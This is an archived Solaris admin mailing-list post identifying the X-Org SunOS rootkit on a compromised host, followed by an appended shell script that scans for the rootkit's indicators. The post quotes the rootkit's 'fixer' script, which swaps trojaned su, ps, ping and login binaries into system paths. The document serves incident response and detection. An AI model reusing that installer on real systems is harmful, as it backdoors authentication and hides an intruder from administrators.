Hello, list, and thanks to everyone who responded, particularly: Neil Quiogue, "the hatter", Dik Casper, Chris Keladis, Michael Palamara, Calin Siulea, Christer Eriksson, David Foster, Meder Kydyraliev.

Basically, it's the X-Org SunOS rootkit from Sept 2001, which replaces, among other things: /usr/bin/login (which makes it impossible to log in through telnet), su, ps, ping, find (maybe netstat and ls, too).

It installs into /usr/lib/libX.a and /dev/pts/01. The directories might not be visible, since ls could be trojaned. cd'ing is possible, though.

Extract from the "fixer" script of the rootkit:

***************
cp /usr/bin/su /dev/pts/01/55su
cp /usr/bin/ps /dev/pts/01/55ps
cp /usr/sbin/ping /dev/pts/01/55ping
cp /usr/bin/login /dev/pts/01/55login
/usr/bin/wget ftp://sunsolve.sun.com/pub/patches/2.7_Recommended.tar.Z >/dev/null
uncompress 2.7_Recommended.tar.Z
tar -xf 2.7_Recommended.tar
cd 2.7_Recommended
echo y|./install_cluster -nosave -q
cd /tmp
rm -rf 2.7_Recommended.tar 2.7_Recommended
cp -f /usr/bin/su /dev/pts/01/bin/su
cp -f /dev/pts/01/55su /usr/bin/su
cp -f /usr/bin/ps /dev/pts/01/bin/psr
cp -f /dev/pts/01/55ps /usr/bin/ps
cp -f /usr/sbin/ping /dev/pts/01/bin/ping
cp -f /dev/pts/01/55ping /usr/sbin/ping
mv -f /usr/bin/login /sbin/xlogin
cp -f /dev/pts/01/55login /usr/bin/login
***********************

The initial exploit channel is difficult to check, since it could exploit a flaw in snmpXdmid according to CERT.

Problem was: old system, old Solaris, old 3rd-party binaries, too few patches. With a 3-year-old patch, the system should have been safe.

It is off the public network and will be reinstalled anyhow, as that's the only really safe solution.

The abuse report has been sent to the netblock owner of the server hosting the rootkit.

Rami

_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers
Received on Fri Feb 4 06:07:11 2005
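The indicators Rami lists (a directory parked under /dev/pts, the dropped /usr/lib/libX.a, the real login moved to /sbin/xlogin, and trojaned copies of login, su, ps and ping) can be checked without trusting the victim's ls or find, which the post notes may themselves be replaced. The script below is an added example, not code from the post or from the rootkit; it uses only shell globbing, test and cksum, so the shell reads /dev/pts itself instead of asking a possibly trojaned ls. The baseline format ("cksum size /path" lines produced by running cksum on a known-good installation) and the ROOT argument for a disk mounted from a CD boot are assumptions of this example. Run it with ksh or /usr/xpg4/bin/sh on Solaris 7, since the old /bin/sh there lacks $(...) and $((...)).

```shell
#!/bin/sh
# Indicator scan for the X-Org SunOS rootkit described in the post above.
# Added example, not from the original post. Indicators checked:
#   - a directory hidden under /dev/pts (the kit lives in /dev/pts/01)
#   - the dropped /usr/lib/libX.a
#   - the original login moved aside to /sbin/xlogin
#   - trojaned /usr/bin/login, su, ps, /usr/sbin/ping, found by comparing
#     cksum output against a baseline taken from a trusted installation
# Only sh built-ins, test and cksum are used, so the victim's possibly
# trojaned ls/find are never executed. On Solaris run under ksh or
# /usr/xpg4/bin/sh; the pre-POSIX /bin/sh there lacks $(...) and $((...)).

# scan_rootkit_indicators ROOT [BASELINE]
#   ROOT      where the suspect filesystem is mounted: "/" for a live check,
#             or e.g. /a after booting from CD and mounting the disk there
#             (preferred, since binaries on the victim cannot be trusted).
#   BASELINE  optional file of "cksum size /path" lines (assumed format),
#             produced on a known-good system with:
#               cksum /usr/bin/login /usr/bin/su /usr/bin/ps /usr/sbin/ping
# Prints one "FINDING: ..." line per indicator; returns 0 if nothing was found.
scan_rootkit_indicators() {
    root=${1%/}            # "/" becomes "", so "$root/dev/pts" stays valid
    baseline=$2
    findings=0

    # 1. /dev/pts should contain only pty device nodes. The shell expands the
    #    glob itself, so a trojaned ls cannot hide a directory from this loop.
    for entry in "$root"/dev/pts/* "$root"/dev/pts/.[!.]*; do
        [ -e "$entry" ] || continue              # pattern matched nothing
        if [ -d "$entry" ]; then
            echo "FINDING: directory under /dev/pts: ${entry#"$root"}"
            findings=$((findings + 1))
        fi
    done

    # 2. Files the fixer script leaves behind.
    for path in /usr/lib/libX.a /sbin/xlogin; do
        if [ -e "$root$path" ]; then
            echo "FINDING: rootkit artefact present: $path"
            findings=$((findings + 1))
        fi
    done

    # 3. Binaries whose checksum no longer matches the trusted baseline.
    if [ -n "$baseline" ] && [ -r "$baseline" ]; then
        while read -r sum size path; do
            [ -n "$path" ] || continue
            if [ ! -f "$root$path" ]; then
                echo "FINDING: baseline file missing: $path"
                findings=$((findings + 1))
                continue
            fi
            # Feeding cksum via stdin makes it print "crc size" with no name.
            set -- $(cksum < "$root$path")
            if [ "$1" != "$sum" ] || [ "$2" != "$size" ]; then
                echo "FINDING: checksum mismatch: $path (baseline $sum $size, now $1 $2)"
                findings=$((findings + 1))
            fi
        done < "$baseline"
    fi

    if [ "$findings" -eq 0 ]; then
        echo "no rootkit indicators found under ${root:-/}"
        return 0
    fi
    return 1
}

# Direct use:  sh scan.sh /a /floppy/baseline   (no arguments: define only)
if [ $# -gt 0 ]; then
    scan_rootkit_indicators "$1" "${2:-}"
fi
```

Take the baseline from install media or an untouched peer system, never from the suspect host after the fact: the fixer script above patches the box and swaps in its own su, ps, ping and login in one pass, so checksums recorded afterwards would simply enshrine the trojans.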
This archive was generated by hypermail 2.1.8 : Thu Mar 03 2016 - 06:43:43 EST